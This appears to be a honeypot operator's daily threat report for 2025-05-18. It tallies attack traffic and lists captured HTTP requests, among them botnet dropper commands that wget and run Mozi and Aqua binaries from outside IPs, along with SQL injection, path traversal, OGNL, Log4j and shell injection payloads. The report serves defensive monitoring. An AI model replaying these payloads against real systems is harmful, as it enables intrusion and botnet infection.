Table of Contents

Daily Report: 2025-05-18
#

Executive summary
#

interaction report on http service of various Hhoneypot around the world.

Executive summary
OT report simplified
Botnet dropper behaviour
List of request
List of country_iso_code

executive_summary
#

In today’s repport, we detected 22 stage 1 IP address(es), linked to 22 dropper URL(s).

There are 761 new requests that have never been observed before (these were added to the monitored request database.).

A total of 4999 requests were recorded during the day, originating from 22 different countries, with a peak of 1967 requests coming from BR.

ot_simplified_report
#

simplified report for medium-level interactions with honeypots that mimic industrial systems (web site loading, or interactions with the website), for more contact us on social@shoggoth.industries.

source_country	targeted_country
US	Dubai
KR	Dubai
BR	Dubai
CA	Georgia
CN	Georgia

botnet_dropper_behaviour
#

remote_addr	request
178.141.244.124	GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http://192.168.1.1:8088/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/&currentsetting.htm=1 HTTP/1.0
141.98.11.147	GET /shell?cd+/tmp;rm+-rf+j;nohup+wget+http:/\x5C/94.26.90.251/Aqua.x86;chmod+777+;./Aqua.x86 x86;cd+/tmp;rm+-rf+j;nohup+wget+http:/\x5C/94.26.90.251/Aqua.arm7;chmod+777+;./Aqua.arm7 arm7 HTTP/1.1
182.127.178.175	27;wget%20http://%s:%d/Mozi.m%20-O%20->%20/tmp/Mozi.m;chmod%20777%20/tmp/Mozi.m;/tmp/Mozi.m%20dlink.mips%27$ HTTP/1.0
144.24.88.37	mac=1&ip=127.0.0.1
144.24.88.37	GET /backupmgt/localJob.php?session=fail;wget+http://d0l235hfbd6ifhi9kb1gztmw8bwumodx7.oast.live; HTTP/1.1
144.24.88.37	GET /backupmgt/pre_connect_check.php?auth_name=fail;wget+http://d0l235hfbd6ifhi9kb1gophtu63qahpk1.oast.live; HTTP/1.1
204.216.147.144	mac=1&ip=127.0.0.1
204.216.147.144	GET /backupmgt/localJob.php?session=fail;wget+http://d0l23ge3tjmd51ltm35g85gd9a5u97mf6.oast.pro; HTTP/1.1
204.216.147.144	GET /backupmgt/pre_connect_check.php?auth_name=fail;wget+http://d0l23ge3tjmd51ltm35g7gawit638oxft.oast.pro; HTTP/1.1
144.24.88.37	GET /search.php?search=%22;wget+http%3A%2F%2Fd0l235hfbd6ifhi9kb1gqcxr6fizrfq68.oast.live%27;%22 HTTP/1.1
144.24.88.37	GET /Collector/storagemgmt/apply?data%5B0%5D%5Bhost%5D=%60/bin/wget+http://d0l235hfbd6ifhi9kb1giampijew45jbc.oast.live%60&data%5B0%5D%5Bpath%5D=mypath&data%5B0%5D%5Btype%5D=mytype HTTP/1.1
144.24.88.37	GET /Collector/nms/addModifyZTDProxy?ztd_server=127.0.0.1&ztd_port=3333&ztd_username=user&ztd_password=$(/bin/wget$IFShttp://d0l235hfbd6ifhi9kb1gka1hk7eqr6j5m.oast.live) HTTP/1.1
204.216.147.144	GET /search.php?search=%22;wget+http%3A%2F%2Fd0l23ge3tjmd51ltm35gxi7r4e4jcwucq.oast.pro%27;%22 HTTP/1.1
204.216.147.144	GET /Collector/storagemgmt/apply?data%5B0%5D%5Bhost%5D=%60/bin/wget+http://d0l23ge3tjmd51ltm35gdjewbi9mc4jgn.oast.pro%60&data%5B0%5D%5Bpath%5D=mypath&data%5B0%5D%5Btype%5D=mytype HTTP/1.1
204.216.147.144	GET /Collector/nms/addModifyZTDProxy?ztd_server=127.0.0.1&ztd_port=3333&ztd_username=user&ztd_password=$(/bin/wget$IFShttp://d0l23ge3tjmd51ltm35g4jy3ef1dej1qb.oast.pro) HTTP/1.1
144.24.88.37	GET /cgi-bin/mesh.cgi?page=upgrade&key=;%27wget+http://d0l235hfbd6ifhi9kb1gwwdp1qneysufg.oast.live;%27 HTTP/1.1
144.24.88.37	GET /cgi-bin/touchlist_sync.cgi?IP=;wget+http://d0l235hfbd6ifhi9kb1gm4nam7wqf8ng9.oast.live; HTTP/1.1
144.24.88.37	GET /page?id=2xHOXI5DAb0vIZruVxHD8lgvA9T&settings[view%20options][outputFunctionName]=x;process.mainModule.require(%27child_process%27).execSync(%27wget+http://d0l235hfbd6ifhi9kb1gh7kkwjb6t19ou.oast.live%27);s HTTP/1.1
204.216.147.144	GET /cgi-bin/mesh.cgi?page=upgrade&key=;%27wget+http://d0l23ge3tjmd51ltm35ggo65fc4foo1z7.oast.pro;%27 HTTP/1.1
204.216.147.144	GET /cgi-bin/touchlist_sync.cgi?IP=;wget+http://d0l23ge3tjmd51ltm35gdcn7e5xggd5bu.oast.pro; HTTP/1.1
204.216.147.144	GET /page?id=2xHOd9lQalv3MJBEcMW2wagnBEn&settings[view%20options][outputFunctionName]=x;process.mainModule.require(%27child_process%27).execSync(%27wget+http://d0l23ge3tjmd51ltm35grtwupf9foz9i6.oast.pro%27);s HTTP/1.1
141.98.11.128	GET /cgi-bin/luci/;stok=/locale?form=country&operation=write&country=$(id%3E%60cd+%2Ftmp%3B+rm+-rf+r%3B+wget+http%3A%2F%2F212.81.47.226%2Fr%3B+chmod+777+r%3B+.%2Fr+tplink%3B+rm+-rf+r%60) HTTP/1.1

request
#

The list of requests presented here are those that have not yet been yet integrated into the request database.

	number_of_occurence	request
4	24	POST /_ignition/execute-solution HTTP/1.1
7	20	GET /api/v1/database/5 HTTP/1.1
8	20	GET /api/v1/database/10 HTTP/1.1
9	20	POST /apply_sec.cgi HTTP/1.1
10	20	GET /api/v1/database/6 HTTP/1.1
12	20	GET /api/v1/database/9 HTTP/1.1
13	20	GET /api/v1/database/2 HTTP/1.1
14	20	POST /app HTTP/1.1
15	20	GET /api/v1/database/1 HTTP/1.1
16	20	GET /api/v1/database/3 HTTP/1.1
17	20	GET /api/v1/database/4 HTTP/1.1
18	20	GET /api/v1/database/7 HTTP/1.1
19	16	POST /ajax-api/2.0/mlflow/model-versions/create HTTP/1.1
20	16	GET /?p=1 HTTP/1.1
22	16	POST /CFIDE/wizards/common/utils.cfc?method=wizardHash%20inPassword=bar%20_cfclient=true HTTP/1.1
25	12	POST /cgi-bin/vitogate.cgi HTTP/1.1
26	12	GET /solr/admin/cores?wt=json HTTP/1.1
27	12	POST /webtools/control/SOAPService HTTP/1.1
28	12	POST /index.php HTTP/1.1
29	12	POST /ajax-api/2.0/mlflow/registered-models/create HTTP/1.1
31	12	POST /WSVulnerabilityCore/VulCore.asmx HTTP/1.1
32	12	POST /vendor/htmlawed/htmlawed/htmLawedTest.php HTTP/1.1
33	12	POST /wls-wsat/CoordinatorPortType HTTP/1.1
34	12	POST /mgmt/shared/authn/login HTTP/1.1
35	12	POST /tmui/locallb/workspace/tmshCmd.jsp HTTP/1.1
38	8	POST /index.php?owa_do=base.loginForm&owa_site_id HTTP/1.1
39	8	POST /run HTTP/1.1
40	8	GET /tiki-login_scr.php HTTP/1.1
41	8	GET /zimbraAdmin/0MVzAe6pgwe5go1D.jsp HTTP/1.1
42	8	POST /lib/crud/userprocess.php HTTP/1.1
43	8	GET /pfblockerng/www/index.php HTTP/1.1
45	8	POST /cgi-bin/login.cgi HTTP/1.1
47	8	GET /login.rst HTTP/1.1
48	8	POST /scgi-bin/platform.cgi HTTP/1.1
49	8	GET /images/icons_title.gif HTTP/1.1
51	8	POST /cobbler_api HTTP/1.1
52	8	POST /webadm/?q=moni_detail.do&action=gragh HTTP/1.1
53	8	POST /login.php HTTP/1.1
54	8	POST /checkValid HTTP/1.1
55	8	POST /classes/Login.php?f=login HTTP/1.1
56	8	POST /servlet/~ic/bsh.servlet.BshServlet HTTP/1.1
57	8	POST /account HTTP/1.1
59	8	POST /./RestAPI/LogonCustomization HTTP/1.1
60	8	POST /OA_HTML/BneViewerXMLService?bne:uueupload=TRUE HTTP/1.1
61	8	POST /ajax/render/widget_tabbedcontainer_tab_panel HTTP/1.1
62	8	GET /wp-content/plugins/import-xml-feed/readme.txt HTTP/1.1
63	8	POST /modules/ndk_steppingpack/search-result.php HTTP/1.1
64	8	POST /getcfg.php HTTP/1.1
65	8	POST /wp-json/post-smtp/v1/connect-app HTTP/1.1
66	8	POST /nacos/v1/cs/configs?dataId=nacos.cfg.dataIdfoo&group=foo&content=helloWorld HTTP/1.1
68	8	POST /cms/content/list HTTP/1.1
69	8	POST /admin/login.php HTTP/1.1
70	8	GET /setup/setupadministrator-start.action HTTP/1.1
71	8	POST /main/webservices/additional_webservices.php HTTP/1.1
73	8	POST /geoserver/wms HTTP/1.1
74	8	POST /dologin.action HTTP/1.1
75	8	POST /pages/createpage-entervariables.action HTTP/1.1
76	8	GET /_api/web/siteusers HTTP/1.1
78	8	POST /as/wapi/vmp HTTP/1.1
79	8	POST /auth/requestreset HTTP/1.1
80	8	POST /secserver/ HTTP/1.1
81	8	POST /upload HTTP/1.1
82	8	POST /api/jsonws/invoke HTTP/1.1
136	6	GET /nagiosxi/login.php HTTP/1.1
137	6	POST /boardDataWW.php HTTP/1.1
149	4	POST /goform/formWsc HTTP/1.1
150	4	POST /account/index.php HTTP/1.1
151	4	GET /formLoginAuth.htm?authCode=1&userName=admin&goURL&action=login HTTP/1.1
152	4	GET /images/..%2finfo.html HTTP/1.1
153	4	GET /cgi-bin/cgiServer?worker=IndexNew HTTP/1.1
154	4	POST /Side.php HTTP/1.1
155	4	POST /AdminService/urest/v1/LogonResource HTTP/1.1
156	4	GET /tmui/login.jsp/..;/tmui/locallb/workspace/fileRead.jsp?fileName=/config/bigip.license HTTP/1.1
157	4	POST /api/v1/method.callAnon/getPasswordPolicy HTTP/1.1
158	4	POST /cgi?7 HTTP/1.1
160	4	POST /templates/editor-preload-container HTTP/1.1
161	4	POST /tc.CBS.Appl/tcspseudo HTTP/1.1
162	4	POST /RPC2_Login HTTP/1.1
163	4	POST /storfs-asup HTTP/1.1
164	4	POST /analytics/telemetry/ph/api/hyper/send?_c&_i=test HTTP/1.1
165	4	POST /CTCWebService/CTCWebServiceBean/ConfigServlet HTTP/1.1
166	4	GET /appGet.cgi?hook=get_cfg_clientlist() HTTP/1.1
167	4	POST /goform/setmac HTTP/1.1
168	4	GET /module/productcomments/CommentGrade?id_products[]=1*if(now()=sysdate()%2Csleep(8)%2C0) HTTP/1.1
169	4	GET /index.php?fc=module&module=productcomments&controller=CommentGrade&id_products[]=1%20AND%20(SELECT%203875%20FROM%20(SELECT(SLEEP(8)))xoOt) HTTP/1.1
170	4	GET /hsqldb%0a HTTP/1.1
171	4	POST /sitecore_xaml.ashx/-/xaml/Sitecore.Xaml.Tutorials.Styles.Index HTTP/1.1
172	4	POST /moveitisapi/moveitisapi.dll?action=m2 HTTP/1.1
173	4	POST /?PHPRC=/dev/fd/0 HTTP/1.1
174	4	POST /guestaccess.aspx HTTP/1.1
175	4	POST /loadfile.lp?pageid=Configure HTTP/1.1
176	4	POST /cgi-bin/mt/mt-xmlrpc.cgi HTTP/1.1
177	4	GET /wp-admin/admin-ajax.php?action=ays_sccp_results_export_file&sccp_id[]=3)%20AND%20(SELECT%205921%20FROM%20(SELECT(SLEEP(6)))LxjM)%20AND%20(7754=775&type=json HTTP/1.1
178	4	POST /lucee/admin/imgProcess.cfm?file=/whatever HTTP/1.1
179	4	POST /logupload?logMetaData=%7B%22itrLogPath%22%3A%20%22..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fhttpd%2Fhtml%2Fwsgi_log_upload%22%2C%20%22logFileType%22%3A%20%22log_upload_wsgi.py%22%2C%20%22workloadID%22%3A%20%222%22%7D HTTP/1.1
180	4	GET /tmui/login.jsp/..;/tmui/locallb/workspace/fileRead.jsp?fileName=/etc/f5-release HTTP/1.1
181	4	GET /Assets/temp/hotspot/img/logohotspot.txt HTTP/1.1
182	4	GET /index.php?app=main&inc=core_auth&route=login HTTP/1.1
183	4	POST ///CFIDE/adminapi/accessmanager.cfc?method=foo&_cfclient=true HTTP/1.1
184	4	GET /wp-content/plugins/wc-multivendor-marketplace/readme.txt HTTP/1.1
185	4	POST /ui/h5-vsan/rest/proxy/service/com.vmware.vsan.client.services.capability.VsanCapabilityProvider/getClusterCapabilityData HTTP/1.1
186	4	GET /dashboardUser HTTP/1.1
187	4	POST /cgi/networkDiag.cgi HTTP/1.1
188	4	POST /ajaxPages/writeBrowseFilePathAjax.php HTTP/1.1
190	4	GET /x HTTP/1.1
191	4	POST /texteditor.php HTTP/1.1
193	4	POST /index.php/management/set_timezone HTTP/1.1
194	4	GET /assets/app/something/services/AppModule.class/ HTTP/1.1
195	4	POST /admin/ HTTP/1.1
196	4	GET /wp-content/plugins/paid-memberships-pro/js/pmpro-checkout.js HTTP/1.1
197	4	POST /pages/createpage-entervariables.action?SpaceKey=x HTTP/1.1
198	4	POST /pages/createpage.action?spaceKey=myproj HTTP/1.1
199	4	POST /wiki/pages/createpage-entervariables.action HTTP/1.1
200	4	POST /Config/SaveUploadedHotspotLogoFile HTTP/1.1
201	4	POST /pages/doenterpagevariables.action HTTP/1.1
202	4	GET /wp-json/wp/v2/users/ HTTP/1.1
203	4	POST /wp-json/pie/v1/login HTTP/1.1
204	4	POST /wp-comments-post.php HTTP/1.1
205	4	POST /homeaction.php HTTP/1.1
206	4	POST /wp-admin/admin-ajax.php?action=pollinsertvalues HTTP/1.1
207	4	GET /owa/auth/x.js HTTP/1.1
208	4	POST /Servlet/Skins HTTP/1.1
209	4	POST /inc/jquery/uploadify/uploadify.php HTTP/1.1
210	4	POST /confluence/pages/createpage-entervariables.action HTTP/1.1
211	4	POST /confluence/pages/createpage-entervariables.action?SpaceKey=x HTTP/1.1
212	4	GET /session/login HTTP/1.1
213	4	POST /users/user-dark-features HTTP/1.1
214	4	POST /wiki/pages/createpage-entervariables.action?SpaceKey=x HTTP/1.1
215	4	POST /pages/templates2/viewpagetemplate.action HTTP/1.1
216	4	POST /wp-admin/admin-ajax.php?action=uploadFontIcon HTTP/1.1
217	4	POST /template/custom/content-editor HTTP/1.1
218	4	POST /session/create HTTP/1.1
219	4	POST /setup/setupadministrator.action HTTP/1.1
220	4	GET /api/hassio_ingress/.%09./supervisor/info HTTP/1.1
222	4	POST /tmui/locallb/workspace/fileSave.jsp HTTP/1.1
223	4	GET /wp-content/plugins/mstore-api/readme.txt HTTP/1.1
224	4	GET /wp-admin/admin-ajax.php?action=get_question&question_id=1%20AND%20(SELECT%207242%20FROM%20(SELECT(SLEEP(7)))HQYx) HTTP/1.1
225	4	POST /opensis/index.php HTTP/1.1
226	4	GET /api/hassio/app/.%09./supervisor/info HTTP/1.1
227	4	POST /api/runscript HTTP/1.1
228	4	GET /wp-admin/admin-ajax.php?action=mec_load_single_page&time=1))%20UNION%20SELECT%20sleep(6)%20–%20g HTTP/1.1
229	4	POST /lumis/portal/controller/xml/PageControllerXml.jsp HTTP/1.1
230	4	POST /HandleEvent HTTP/1.1
231	4	POST /wp-admin/admin.php?page=contest-gallery/index.php&users_management=true&option_id=1 HTTP/1.1
232	4	GET /?rest_route=/wp/v2/users HTTP/1.1
233	4	GET /ws/msw/tenant/%27%20union%20select%20%28select%20ID%20from%20SGMSDB.DOMAINS%20limit%201%29%2C%20%27%27%2C%20%27%27%2C%20%27%27%2C%20%27%27%2C%20%27%27%2C%20%28select%20concat%28id%2C%20%27%3A%27%2C%20password%29%20from%20sgmsdb.users%20where%20active%20%3D%20%271%27%20order%20by%20issuperadmin%20desc%20limit%201%20offset%200%29%2C%27%27%2C%20%27%27%2C%20%27 HTTP/1.1
234	4	GET /forum/?subscribe_topic=1%20union%20select%201%20and%20sleep(6) HTTP/1.1
235	4	GET /wp-content/plugins/ultimate-member/readme.txt HTTP/1.1
237	4	POST /redfish/v1/SessionService/Sessions/ HTTP/1.1
238	4	GET /?rest_route=/pmpro/v1/checkout_level&level_id=3&discount_code=%27%20%20union%20select%20sleep(6)%20–%20g HTTP/1.1
239	4	GET /appliance/login HTTP/1.1
240	4	GET /api/hassio/app/.%252e/supervisor/info HTTP/1.1
241	4	POST /wp-admin/admin-ajax.php?action=rtec_send_unregister_link HTTP/1.1
242	4	GET /queues HTTP/1.1
243	4	GET /csrf HTTP/1.1
244	4	GET /api/v2/parameters/core/ HTTP/1.1
245	4	POST /%2577eb%2575i_%2577sma_Http HTTP/1.1
246	4	POST /classes/Master.php?f=delete_request HTTP/1.1
247	4	POST /classes/Master.php?f=delete_team HTTP/1.1
248	4	POST /classes/Master.php?f=delete_inquiry HTTP/1.1
249	4	POST /cgi-bin/mainfunction.cgi HTTP/1.1
250	4	GET /?wmcAction=wmcTrack&url=test&uid=0&pid=0&visitorId=1331’+and+sleep(7)+or+’ HTTP/1.1
251	4	GET /elfinder/php/connector.minimal.php?cmd=file&target=l1_<@base64>/var/www/html/elfinder/files//..//..//..//..//..//../etc/passwd<@/base64>&download=1 HTTP/1.1
252	4	GET /mims/updatecustomer.php?customer_number=-1’%20UNION%20ALL%20SELECT%20NULL,NULL,CONCAT(md5(999999999),1,2),NULL,NULL,NULL,NULL,NULL,NULL’ HTTP/1.1
253	4	POST /actuator/gateway/refresh HTTP/1.1
255	4	POST /admin/index.php HTTP/1.1
256	4	POST /conf_mail.php HTTP/1.1
257	4	POST /dfsms/index.php HTTP/1.1
258	4	POST /hms/doctor/ HTTP/1.1
260	4	GET /owa-data/caches/1/owa_user/c30da9265ba0a4704db9229f864c9eb7.php HTTP/1.1
261	4	POST /cgi-bin/nightled.cgi HTTP/1.1
262	4	POST /admin/uploads.php?id=1 HTTP/1.1
263	4	GET /%24%7B%28%23a%3D%40org.apache.commons.io.IOUtils%40toString%28%40java.lang.Runtime%40getRuntime%28%29.exec%28%22whoami%22%29.getInputStream%28%29%2C%22utf-8%22%29%29.%28%40com.opensymphony.webwork.ServletActionContext%40getResponse%28%29.setHeader%28%22X-Cmd-Response%22%2C%23a%29%29%7D/ HTTP/1.1
264	4	POST /OASREST/v2/authenticate HTTP/1.1
265	4	GET /modules/appagebuilder/config.xml HTTP/1.1
266	4	POST /wp-json/am-member/license HTTP/1.1
267	4	POST /index.php?c=blocked&action=continue HTTP/1.1
269	4	POST /api.php HTTP/1.1
270	4	POST /apisix/batch-requests HTTP/1.1
271	4	POST /servlets/OmaDsServlet HTTP/1.1
272	4	POST /configWizard/keyUpload.jsp HTTP/1.1
273	4	POST /flash/addcrypted2 HTTP/1.1
274	4	POST /jeecg-boot/jmreport/qurestSql HTTP/1.1
275	4	POST /wbm/plugins/wbm-legal-information/platform/pfcXXX/licenses.php HTTP/1.1
276	4	GET /vcac/ HTTP/1.1
278	4	POST /hms/user-login.php HTTP/1.1
279	4	POST /ajax/openvpn/del_ovpncfg.php HTTP/1.1
280	4	GET /index.php/user/ HTTP/1.1
281	4	POST /controller/ping.php HTTP/1.1
282	4	POST /task/loginValidation.php HTTP/1.1
283	4	POST /wp-admin/admin-ajax.php?action=joomsport_md_load HTTP/1.1
284	4	GET /ccms/dashboard.php HTTP/1.1
285	4	GET /wp-content/plugins/cryptocurrency-widgets-pack/readme.txt HTTP/1.1
286	4	POST /network_test.php HTTP/1.1
288	4	GET /api/v2/cmdb/system/admin HTTP/1.1
289	4	POST /Startup/Register HTTP/1.1
291	4	GET /ws-api/v2/users/me/details?token=02 HTTP/1.1
292	4	POST /wp-admin/admin-ajax.php?action=get_tag_fonts HTTP/1.1
293	4	GET /wp-admin/admin-ajax.php?action=mcwp_table&mcwp_id=1&order[0][column]=0&columns[0][name]=name+AND+(SELECT+1+FROM+(SELECT(SLEEP(7)))aaaa)–+- HTTP/1.1
294	4	GET /dfsms/add-category.php HTTP/1.1
295	4	GET /backupsettings.dat HTTP/1.1
296	4	POST /api/content/ HTTP/1.1
297	4	GET /admin/ajax/pages.php?id=(sleep(6)) HTTP/1.1
299	4	POST /webapi/auth HTTP/1.1
300	4	GET /cgi-bin/popen.cgi?command=cat%20/etc/passwd&v=0.1303033443137912 HTTP/1.1
301	4	GET /cgi-bin/popen.cgi?command=type%20C://Windows/win.ini&v=0.1303033443137912 HTTP/1.1
302	4	GET /accounts/login/ HTTP/1.1
303	4	POST /service/extension/backup/mboximport?account-name=admin&ow=2&no-switch=1&append=1 HTTP/1.1
304	4	POST /js/jquery_file_upload/server/php/ HTTP/1.1
306	4	POST /app/options.py HTTP/1.1
307	4	GET /card_scan.php?No=123&ReaderNo=`sleep%207`&CardFormatNo=123 HTTP/1.1
308	4	GET /wp-json/lp/v1/courses/archive-course?template_path=..%2F..%2F..%2Fetc%2Fpasswd&return_type=html HTTP/1.1
310	4	GET /wp-content/plugins/wp-statistics/readme.txt HTTP/1.1
311	4	POST /service/extension/backup/mboximport?account-name=admin&account-status=1&ow=cmd HTTP/1.1
312	4	GET /flash/addcrypted2 HTTP/1.1
313	4	GET /spip.php?page=spip_pass HTTP/1.1
314	4	GET /welcome.action HTTP/1.1
316	4	GET /wp-json/wp/v2/add-listing?id=1 HTTP/1.1
317	4	GET /wp-admin/profile.php HTTP/1.1
318	4	GET /wp-content/plugins/arprice-responsive-pricing-table/js/arprice.js HTTP/1.1
319	4	GET /login.do?jvar_page_title=%3Cstyle%3E%3Cj%3Ajelly%2Bxmlns%3Aj%3D%22jelly%3Acore%22%2Bxmlns%3Ag%3D’glide’%3E%3Cg%3Aevaluate%3Ez%3Dnew%2BPackages.java.io.File(%22%22).getAbsolutePath()%3Bz%3Dz.substring(0%2Cz.lastIndexOf(%22%2F%22))%3Bu%3Dnew%2BSecurelyAccess(z.concat(%22%2Fco..nf%2Fglide.db.properties%22)).getBufferedReader()%3Bs%3D%22%22%3Bwhile((q%3Du.readLine())!%3D%3Dnull)s%3Ds.concat(q%2C%22%5Cn%22)%3Bgs.addErrorMessage(s)%3B%3C%2Fg%3Aevaluate%3E%3C%2Fj%3Ajelly%3E%3C%2Fstyle%3E HTTP/1.1
320	4	GET /?rest_route=/wc/v3/wishlist/remove_product/1&item_id=0%20union%20select%20sleep(7)%20–%20g HTTP/1.1
321	4	POST /wp-admin/admin.php?page=html2wp-settings HTTP/1.1
322	4	GET /wp-content/plugins/stopbadbots/assets/js/stopbadbots.js HTTP/1.1
323	4	GET /2xHOcy3pb9az5JeVh7awXaJoQbP.txt HTTP/1.1
324	4	GET /wp-admin/admin-ajax.php?action=easync_success_and_save HTTP/1.1
325	4	POST /functionRouter HTTP/1.1
326	4	GET /OA_CGI/FNDWRR.exe HTTP/1.1
327	4	GET /wp-admin/admin-ajax.php?meta_ids=1+AND+(SELECT+3066+FROM+(SELECT(SLEEP(6)))CEHy)&action=remove_post_meta_condition HTTP/1.1
328	4	POST /?rest_route=/notificationx/v1/analytics HTTP/1.1
329	4	GET /wp-content/plugins/gift-voucher/readme.txt HTTP/1.1
331	4	POST /api/v1/login/oauth2/auth HTTP/1.1
332	4	GET /?rest_route=/pvc/v1/increase/1&post_ids=0)%20union%20select%20md5(999999999),null,null%20–%20g HTTP/1.1
333	4	GET /cgi-bin/slogin/login.py HTTP/1.1
334	4	POST /v1/backend1 HTTP/1.1
335	4	POST /cgi?2 HTTP/1.1
336	4	POST /sitecore/shell/ClientBin/Reporting/Report.ashx HTTP/1.1
337	4	POST /banker/index.php HTTP/1.1
338	4	GET /wp-admin/admin-ajax.php?action=vtprd_product_search_ajax&term=aaa%27+union+select+1,sleep(6),3–+- HTTP/1.1
339	4	POST /./RestAPI/Connection HTTP/1.1
340	4	GET /STATE_ID/123/agentLogUploader HTTP/1.1
341	4	GET /client/index.php HTTP/1.1
342	4	GET /?x=${jndi:ldap://127.0.0.1 HTTP/1.1
343	4	GET /help/admin-guide/test.jsp HTTP/1.1
344	4	POST /ddns_check.ccp HTTP/1.1
345	4	GET /2xHOXPT7w51sLylW86RHNNYZhTB.txt HTTP/1.1
346	4	POST /wp-admin/admin-ajax.php?action=wpt_admin_update_notice_option HTTP/1.1
347	4	GET /wp-content/plugins/woc-order-alert/assets/admin/js/scripts.js HTTP/1.1
348	4	GET /vcac/?original_uri=http://xxx.xxx.xxx.xxx:80%2Fvcac HTTP/1.1
349	4	GET /?location=search HTTP/1.1
350	4	GET /wp-content/plugins/vr-calendar-sync/assets/js/public.js HTTP/1.1
351	4	GET /wp-admin/admin-post.php?vrc_cmd=phpinfo HTTP/1.1
352	4	POST /v1/api HTTP/1.1
354	4	GET /wp-admin/admin-ajax.php?action=loginas_return_admin HTTP/1.1
355	4	GET /wp-content/plugins/infographic-and-list-builder-ilist/assets/js/ilist_custom_admin.js HTTP/1.1
358	4	POST /ajax/api/user/save HTTP/1.1
359	4	GET /?rest_route=/pmpro/v1/order&code=a%27%20OR%20(SELECT%201%20FROM%20(SELECT(SLEEP(7)))a)–%20- HTTP/1.1
360	4	GET /wp-admin/admin-ajax.php?action=edd_download_search&s=1’+AND+(SELECT+1+FROM+(SELECT(SLEEP(6)))a)–+- HTTP/1.1
361	4	POST /saas./resttosaasservlet HTTP/1.1
362	4	POST /kubepi/api/v1/users HTTP/1.1
363	4	POST /wp-admin/admin-ajax.php?action=iws_gff_fetch_states HTTP/1.1
364	4	POST /json/setup-restore.action HTTP/1.1
365	4	GET /wp-content/plugins/documentor-lite/core/js/documentor.js HTTP/1.1
366	4	GET /index.php?rest_route=/xs-donate-form/payment-redirect/3 HTTP/1.1
367	4	POST /?rest_route=/olistener/new HTTP/1.1
368	4	GET /wp-content/plugins/paid-memberships-pro/js/updates.js HTTP/1.1
369	4	GET /wp-content/plugins/easy-digital-downloads/readme.txt HTTP/1.1
370	4	GET /geoserver/ows?service=WFS&version=1.0.0&request=GetCapabilities HTTP/1.1
372	4	POST /aspera/faspex/package_relay/relay_package HTTP/1.1
373	4	POST /Synchronization HTTP/1.1
374	4	GET /wp-admin/admin-ajax.php?action=ajax_get&route_name=get_doctor_details&clinic_id=%7B\x22id\x22:\x221\x22%7D&props_doctor_id=1,2)+AND+(SELECT+42+FROM+(SELECT(SLEEP(6)))b HTTP/1.1
375	4	GET /login.do?jvar_page_title=%3c%73%74%79%6c%65%3e%3c%6a%3a%6a%65%6c%6c%79%20%78%6d%6c%6e%73%3a%6a%3d%22%6a%65%6c%6c%79%3a%63%6f%72%65%22%20%78%6d%6c%6e%73%3a%67%3d%27%67%6c%69%64%65%27%3e%3c%67%3a%65%76%61%6c%75%61%74%65%3e%7a%3d%6e%65%77%20%50%61%63%6b%61%67%65%73%2e%6a%61%76%61%2e%69%6f%2e%46%69%6c%65%28%22%22%29%2e%67%65%74%41%62%73%6f%6c%75%74%65%50%61%74%68%28%29%3b%7a%3d%7a%2e%73%75%62%73%74%72%69%6e%67%28%30%2c%7a%2e%6c%61%73%74%49%6e%64%65%78%4f%66%28%22%2f%22%29%29%3b%75%3d%6e%65%77%20%53%65%63%75%72%65%6c%79%41%63%63%65%73%73%28%7a%2e%63%6f%6e%63%61%74%28%22%2f%63%6f%2e%2e%6e%66%2f%67%6c%69%64%65%2e%64%62%2e%70%72%6f%70%65%72%74%69%65%73%22%29%29%2e%67%65%74%42%75%66%66%65%72%65%64%52%65%61%64%65%72%28%29%3b%73%3d%22%22%3b%77%68%69%6c%65%28%28%71%3d%75%2e%72%65%61%64%4c%69%6e%65%28%29%29%21%3d%3d%6e%75%6c%6c%29%73%3d%73%2e%63%6f%6e%63%61%74%28%71%2c%22%5c%6e%22%29%3b%67%73%2e%61%64%64%45%72%72%6f%72%4d%65%73%73%61%67%65%28%73%29%3b%3c%2f%67%3a%65%76%61%6c%75%61%74%65%3e%3c%2f%6a%3a%6a%65%6c%6c%79%3e%3c%2f%73%74%79%6c%65%3e HTTP/1.1
377	4	GET /cgi-bin/sslvpnclient?launchplatform HTTP/1.1
378	4	GET /npm-pwg/..;/usp/searchUsers.do HTTP/1.1
379	4	GET /workflow/ HTTP/1.1
381	4	GET /workflow/jsp/logon.jsp HTTP/1.1
382	4	GET /wp-admin/admin-ajax.php?action=get_monthly_timetable&month=1+AND+(SELECT+6881+FROM+(SELECT(SLEEP(6)))iEAn) HTTP/1.1
383	4	GET /wp-json/post-smtp/v1/get-log HTTP/1.1
384	4	POST /api/file/formimage HTTP/1.1
385	4	POST /v6.58/Products/Authentication HTTP/1.1
386	4	GET /api/v3/user/orgs HTTP/1.1
387	4	POST /Tool/uploadfile.php HTTP/1.1
388	4	GET /?rest_route=/h5vp/v1/view/1&id=1’+AND+(SELECT+1+FROM+(SELECT(SLEEP(6)))a)–+- HTTP/1.1
390	4	GET /cgi-bin/account_mgr.cgi?cmd=cgi_user_add&name=%27;ifconfig;%27 HTTP/1.1
392	4	GET /cgi-bin/account_mgr.cgi?cmd=cgi_user_add&group=%27;ifconfig;%27 HTTP/1.1
393	4	GET /cgi-bin/account_mgr.cgi?cmd=cgi_user_add&group=%27;id;%27 HTTP/1.1
394	4	POST /API/convertCSVtoParquet.php HTTP/1.1
395	4	POST /api/remote HTTP/1.1
396	4	POST /wp-admin/admin-ajax.php?template=../../../../../../../wp-config&value=a&min_symbols=1 HTTP/1.1
398	4	POST /index.php/ajax/ HTTP/1.1
399	4	POST /dataSetParam/verification;swagger-ui/ HTTP/1.1
401	4	POST /developmentserver/metadatauploader?CONTENTTYPE=MODEL&CLIENT=1 HTTP/1.1
403	4	GET /login?login=lutron&password=lutron HTTP/1.1
405	4	GET /dview8/api/usersByLevel HTTP/1.1
406	4	POST /webtools/control/ProgramExport;/?USERNAME&PASSWORD&requirePasswordChange=Y HTTP/1.1
407	4	GET /?rest_route=/lms/stm-lms/order/items&author_id=1&user=1)+AND+%28SELECT+3493+FROM+%28SELECT%28SLEEP%286%29%29%29sauT%29+AND+%283071%3D3071 HTTP/1.1
408	4	POST /wp-json/notificationx/v1/analytics HTTP/1.1
412	4	POST /ajax/ticket_user_db.php HTTP/1.1
